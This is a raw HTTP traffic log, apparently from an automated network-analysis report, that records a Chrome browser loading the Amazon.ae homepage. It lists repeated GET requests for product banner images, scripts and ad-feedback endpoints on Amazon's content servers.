    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41Qtra7lf+L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712462_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712472_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2022/GW/SWM/CarRental-SWM-en-400x39._CB630585803_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51dtNa41nuL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DXRRBVETR66S3T97BM5KF:0 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRN6H17wn-QSCi45d7vspX9sAAAGRVkJhBgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICDhmpvF%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=tb:s-XRRBVETR66S3T97BM5KF|1723729076586&t:1723729078244&adb:adblk_no; ubid-acbae=259-0026151-5947772
    Source: global trafficHTTP traffic detected: GET /images/I/31ihwTsvbBL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_372x232_ae-en._SY116_CB608574218_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-uw1qk_372x232_ae-en._SY116_CB608574221_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-storage_372x232_ae-en._SY116_CB608574222_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-monitor_372x232_ae-en._SY116_CB608574213_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/317JiGToz-L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
